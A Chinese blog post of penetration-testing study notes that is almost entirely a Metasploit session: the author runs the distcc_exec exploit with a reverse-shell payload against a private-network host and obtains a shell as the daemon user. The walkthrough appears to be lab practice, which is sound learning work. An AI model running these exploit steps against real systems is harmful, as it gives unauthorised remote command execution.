渗透杂记2013-07-31

       上个礼拜去旅游,累出翔来了,真想不明白为什么那么多人花钱去买罪受。今天更新一篇,最近在做51的视频教程,旅游回来一直没缓过来劲,这算是学习笔记吧。

  

Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
System information as of Wed Jul 31 14:55:12 CST 2013
System load:  0.31               Processes:           149
Usage of /:   72.0% of 19.06GB   Users logged in:     1
Memory usage: 25%                IP address for eth0: 192.168.11.40
Swap usage:   3%
=> There is 1 zombie process.
Graph this data and manage this system at https://landscape.canonical.com/
Last login: Wed Jul 31 14:31:36 2013 from 192.168.11.5
root@bt:~#
root@bt:~#
root@bt:~# msfpro
[*] Starting Metasploit Console...
_---------.
.' #######   ;."
.---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
"--'.@@@  -.@        @ ,'-   .'--"
".@' ; @       @ `.  ;'
|@@@@ @@@     @    .
' @@@ @@   @@    ,
`.@@@@    @@   .
',@@     @   ;           _____________
(   3 C    )     /|___ / Metasploit! \
;@'. __*__,."    \|--- \_____________/
'(.,...."/
=[ metasploit v4.6.2-1 [core:4.6 api:1.0]
+ -- --=[ 1138 exploits - 718 auxiliary - 194 post
+ -- --=[ 309 payloads - 30 encoders - 8 nops
[*] Successfully loaded plugin: pro
msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show payloads
Compatible Payloads
===================
Name                                Disclosure Date  Rank    Description
----                                ---------------  ----    -----------
cmd/unix/bind_perl                                   normal  Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6                              normal  Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_ruby                                   normal  Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6                              normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/generic                                     normal  Unix Command, Generic Command Execution
cmd/unix/reverse                                     normal  Unix Command Shell, Double reverse TCP (telnet)
cmd/unix/reverse_perl                                normal  Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via perl)
cmd/unix/reverse_ruby                                normal  Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl                            normal  Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_ssl_double_telnet                   normal  Unix Command Shell, Double Reverse TCP SSL (telnet)
msf exploit(distcc_exec) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf exploit(distcc_exec) > show options
Module options (exploit/unix/misc/distcc_exec):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                   yes       The target address
RPORT  3632             yes       The target port
Payload options (cmd/unix/reverse):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address
LPORT  4444             yes       The listen port
Exploit target:
Id  Name
--  ----
0   Automatic Target
msf exploit(distcc_exec) > set RHOST 192.168.11.17
RHOST => 192.168.11.17
msf exploit(distcc_exec) > set LHOST 192.168.11.40
LHOST => 192.168.11.40
msf exploit(distcc_exec) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ruCpcMy2m0BrAfbq;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "ruCpcMy2m0BrAfbq\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.11.40:4444 -> 192.168.11.17:58472) at 2013-07-31 14:59:21 +0800
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
whoami
daemon
cd /
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz

 

本文出自 “文东会” 博客,转载请与作者联系!

你可能感兴趣的:(视频教程)